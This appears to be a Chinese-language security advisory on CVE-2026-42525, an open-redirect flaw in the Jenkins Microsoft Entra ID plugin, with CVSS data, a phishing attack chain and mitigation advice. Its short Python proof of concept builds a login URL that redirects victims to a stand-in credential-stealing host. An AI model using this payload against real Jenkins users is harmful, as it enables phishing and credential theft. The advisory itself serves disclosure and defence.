CVE-2026-42525 Jenkins Entra ID插件开放重定向漏洞

漏洞信息

漏洞编号

CVE-2026-42525

漏洞类型

开放重定向

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Jenkins Microsoft Entra ID Plugin

漏洞概述

Jenkins Microsoft Entra ID Plugin（前身为 Azure AD 插件）在版本 666.v6060de32f87d 及更早版本中存在一个安全漏洞。该插件在处理用户登录后的重定向逻辑时，未能对目标 URL 进行严格的限制和校验。这一缺陷允许攻击者构造特制的恶意链接，诱导受害者点击。当受害者通过此合法的 Jenkins 链接完成身份验证后，系统会将其重定向至攻击者控制的任意网站。由于初始请求指向受信的 Jenkins 服务器，用户往往难以察觉异常，从而极易遭受钓鱼攻击，导致敏感凭证泄露或其他安全风险。

技术细节

该漏洞属于典型的开放重定向（Open Redirect）漏洞，主要源于对输入参数验证不足。Jenkins Microsoft Entra ID 插件负责处理与 Microsoft Entra ID（Azure AD）的 OAuth 2.0 / OIDC 认证集成。在正常的认证流程中，服务端会接收一个用于登录后跳转的参数（通常为 `redirect_uri`、`from` 或类似的查询参数）。在受影响版本中，插件代码未对该参数的值进行域名白名单校验，仅检查了其格式是否为合法 URL。攻击者可以利用这一点，将跳转参数修改为恶意站点（如 http://evil.com/phish）。根据 CVSS 向量 AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N，该漏洞利用无需认证，通过网络发起，但需要用户交互（点击链接）。一旦用户交互触发，系统完整性（I:L）将受到影响，因为用户被引导至非预期的上下文中。

攻击链分析

STEP 1

侦察

攻击者识别出目标组织正在使用 Jenkins，并确认其安装了存在漏洞的 Microsoft Entra ID Plugin 版本。

STEP 2

武器化

攻击者构造一个包含恶意重定向参数的 URL，该 URL 指向目标的 Jenkins 登录页面，但将跳转地址设为钓鱼网站。

STEP 3

投递

攻击者通过网络钓鱼邮件或即时通讯软件，将伪装成合法登录提醒或系统通知的恶意链接发送给目标用户。

STEP 4

利用

用户点击链接，看到熟悉的 Jenkins 登录界面并输入凭证进行认证。

STEP 5

行动

认证成功后，由于插件漏洞，用户浏览器被重定向至攻击者的钓鱼网站，攻击者进而尝试窃取 Session 或进一步信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-42525: Open Redirect in Jenkins Microsoft Entra ID Plugin
# This script demonstrates how an attacker can craft a malicious URL to redirect users.

import urllib.parse

def generate_malicious_url(jenkins_base_url, malicious_target):
    """
    Generates a malicious URL exploiting the open redirect vulnerability.
    Note: The specific parameter name might vary based on plugin configuration,
    commonly 'from', 'redirect', or 'redirectUri' in Jenkins flows.
    """
    # Endpoint handling the login redirection
    login_endpoint = "/securityRealm/commenceLogin" 
    
    # Constructing the payload
    params = {
        "from": malicious_target  # Vulnerable parameter
    }
    
    full_url = f"{jenkins_base_url}{login_endpoint}?{urllib.parse.urlencode(params)}"
    return full_url

if __name__ == "__main__":
    target = "http://jenkins.example.com"
    evil_site = "http://attacker-controlled-site.com/steal-credentials"
    
    exploit_url = generate_malicious_url(target, evil_site)
    print(f"[+] Malicious Link generated:\n{exploit_url}")
    print("\n[+] When a user clicks this link and logs in, they will be redirected to the evil site.")

影响范围

Jenkins Microsoft Entra ID Plugin 666.v6060de32f87d 及更早版本

防御指南

临时缓解措施

如果无法立即升级插件，建议管理员暂时禁用 Microsoft Entra ID 认证方式，转而使用其他受信的认证机制。同时，应加强用户安全教育，警惕要求重新登录的邮件链接，并确保在输入凭证前仔细核对浏览器地址栏中的域名是否完全正确。